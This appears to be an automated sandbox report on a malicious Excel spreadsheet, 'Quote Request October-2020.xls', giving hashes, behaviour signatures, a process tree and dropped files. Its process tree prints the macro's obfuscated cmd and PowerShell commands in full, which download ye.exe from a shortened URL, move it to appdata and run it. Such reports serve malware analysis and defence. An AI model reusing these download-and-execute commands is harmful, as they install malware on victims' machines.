Analysis
- max time kernel: 136s
- max time network: 133s
- platform: windows10_x64
- resource: win10
- submitted: 28-10-2020 08:02
- Static task: static1
- Behavioral task: behavioral1
  Sample: Quote Request October-2020.xls
  Resource: win7
- Behavioral task: behavioral2
  Sample: Quote Request October-2020.xls
  Resource: win10
General
- Target: Quote Request October-2020.xls
- Size: 66KB
- MD5: 57d2e6d7a94b56acfc61035d2577a86a
- SHA1: 69248b27552383513f0b4d5839a63386849217dd
- SHA256: 166989f61fb157324d0c29d69d5aae0aa2a7813c9f4a0c1ab6506730dd66b434
- SHA512: 04b171a580f5d46d82ceb5d6a73009bc8e3a289e75e592e1b0d5b83052a1f37221e3c197bf170da07fbebf7088fa7dfb044103890f127d0af45d2aba01800e2e
Malware Config
- Extracted: https://tinyurl.com/yxmkb9y9
Signatures
- Process spawned unexpected child process (3 IoCs)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes (description for all three rows: Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process):
    pid   pid_target  process  target process
    2124  3940        cmd.exe  EXCEL.EXE
    2244  3940        cmd.exe  EXCEL.EXE
    2368  3940        cmd.exe  EXCEL.EXE
- Blacklisted process makes network request (2 IoCs)
  Processes:
    flow  pid   process
    18    2616  powershell.exe
    22    2616  powershell.exe
- Executes dropped EXE (1 IoC)
  Processes:
    pid   process
    2000  ye.exe
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes:
    description        ioc                                                                                   process
    Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0                       EXCEL.EXE
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz                  EXCEL.EXE
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString   EXCEL.EXE
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes:
    description        ioc                                                            process
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily  EXCEL.EXE
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU     EXCEL.EXE
    Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS              EXCEL.EXE
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes:
    pid   process
    3940  EXCEL.EXE
- Suspicious behavior: EnumeratesProcesses (9 IoCs)
  Processes:
    pid   process         entries
    2616  powershell.exe  3
    2572  powershell.exe  3
    3804  powershell.exe  3
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
    description              pid   process
    Token: SeDebugPrivilege  2572  powershell.exe
    Token: SeDebugPrivilege  2616  powershell.exe
    Token: SeDebugPrivilege  3804  powershell.exe
- Suspicious use of SetWindowsHookEx (12 IoCs)
  Processes:
    pid   process    entries
    3940  EXCEL.EXE  12
- Suspicious use of WriteProcessMemory (15 IoCs)
  Processes:
    description                       pid   process         target process  entries
    PID 3940 wrote to memory of 2124  3940  EXCEL.EXE       cmd.exe         2
    PID 3940 wrote to memory of 2244  3940  EXCEL.EXE       cmd.exe         2
    PID 3940 wrote to memory of 2368  3940  EXCEL.EXE       cmd.exe         2
    PID 2244 wrote to memory of 2572  2244  cmd.exe         powershell.exe  2
    PID 2124 wrote to memory of 2616  2124  cmd.exe         powershell.exe  2
    PID 2368 wrote to memory of 3804  2368  cmd.exe         powershell.exe  2
    PID 3804 wrote to memory of 2000  3804  powershell.exe  ye.exe          3
Processes (process tree; children are indented under their parent)
- C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Quote Request October-2020.xls"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SYSTEM32\cmd.exe
    Command line: cmd /k p^ower^shell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht'+'tps://tinyurl.com/yxmkb9y9'),'ye.exe')
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht'+'tps://tinyurl.com/yxmkb9y9'),'ye.exe')
      - Blacklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\cmd.exe
    Command line: cmd /k p^ower^shell -w 1 stARt`-slE`Ep 20; Move-Item "ye.exe" -Destination "$env:appdata"
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -w 1 stARt`-slE`Ep 20; Move-Item "ye.exe" -Destination "$env:appdata"
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\cmd.exe
    Command line: cmd /k po^wer^shell -w 1 stARt`-slE`Ep 25; cd $env:appdata; ./ye.exe
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -w 1 stARt`-slE`Ep 25; cd $env:appdata; ./ye.exe
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - C:\Users\Admin\AppData\Roaming\ye.exe
        Command line: "C:\Users\Admin\AppData\Roaming\ye.exe"
        - Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  MD5: d737fc27bbf2f3bd19d1706af83dbe3f
  SHA1: 212d219394124968b50769c371121a577d973985
  SHA256: b96b55a2acd9c790092e8132b31e5f0110492f98828098112d46f2f9faa2b982
  SHA512: 974c2db081dd6d1f45763371c41e01173b189ea1a2d893d0bc415670bfa12f3934ba9dea64018b8c063017454d4d92888d6fe6eaad1659e420ba9adcde5e788b
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: e53466bf92bb5d6747f922f11aca0a9c
  SHA1: 9437465500d602b8abcf82eaeb51afcb1a36d18b
  SHA256: 79ca04cadff6832a7dd2df04ab8f56676af8429b3dc324b2c2d1ef23d7d0081e
  SHA512: fdbed140374c758b28ef8d5824161bd916f05ae9a6499ef161351c1e1a1408c6da1a6c9472c1cb1ed37f2c5b874e671dc9bf5ef53bb2bef3cbffc96472337c7c
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: fd8b143fc908b264d00f2c6b3e05ea0b
  SHA1: 1fd03106df56535d75d0f507831a3c4593fe00cc
  SHA256: 432dda5ca8584a4864c51da2a290e859ebc9705062195acd2f70d278d34bb154
  SHA512: d039b32b0466295010cc9a124dc9fd42b48909c34ccd8372e7bbf8f059e0391618eabe059030ba3e3535377c7e4d319d1ded449965a3d69b719166e1a88b815b
- C:\Users\Admin\AppData\Roaming\ye.exe
  MD5: 9511fdd4fff8aa19872ac503e15a5b86
  SHA1: 8db2c03943393cfac44dd56e948852f2d132e2ce
  SHA256: 2265d18a36231a2141dc86a9dd49ef5538ab7f0509cad1459e5d11ccaeb15020
  SHA512: c3526363a40c8a4c2009e16269c907196d376d63c5caa5b5b9825431958aa33bfa1d341cf162210da84233090ed0ec2f748eabdd4e4e14a1cdc76ccd8fa85426
- C:\Users\Admin\Documents\ye.exe
  MD5: 9511fdd4fff8aa19872ac503e15a5b86
  SHA1: 8db2c03943393cfac44dd56e948852f2d132e2ce
  SHA256: 2265d18a36231a2141dc86a9dd49ef5538ab7f0509cad1459e5d11ccaeb15020
  SHA512: c3526363a40c8a4c2009e16269c907196d376d63c5caa5b5b9825431958aa33bfa1d341cf162210da84233090ed0ec2f748eabdd4e4e14a1cdc76ccd8fa85426
- memory/2000-19-0x0000000000000000-mapping.dmp
- memory/2124-1-0x0000000000000000-mapping.dmp
- memory/2244-2-0x0000000000000000-mapping.dmp
- memory/2368-3-0x0000000000000000-mapping.dmp
- memory/2572-4-0x0000000000000000-mapping.dmp
- memory/2572-13-0x0000026757740000-0x0000026757741000-memory.dmp (Filesize: 4KB)
- memory/2572-9-0x0000026757590000-0x0000026757591000-memory.dmp (Filesize: 4KB)
- memory/2572-7-0x00007FFACBF70000-0x00007FFACC95C000-memory.dmp (Filesize: 9.9MB)
- memory/2616-6-0x00007FFACBF70000-0x00007FFACC95C000-memory.dmp (Filesize: 9.9MB)
- memory/2616-5-0x0000000000000000-mapping.dmp
- memory/3804-10-0x00007FFACBF70000-0x00007FFACC95C000-memory.dmp (Filesize: 9.9MB)
- memory/3804-8-0x0000000000000000-mapping.dmp
- memory/3940-0-0x00007FFAD49C0000-0x00007FFAD4FF7000-memory.dmp (Filesize: 6.2MB)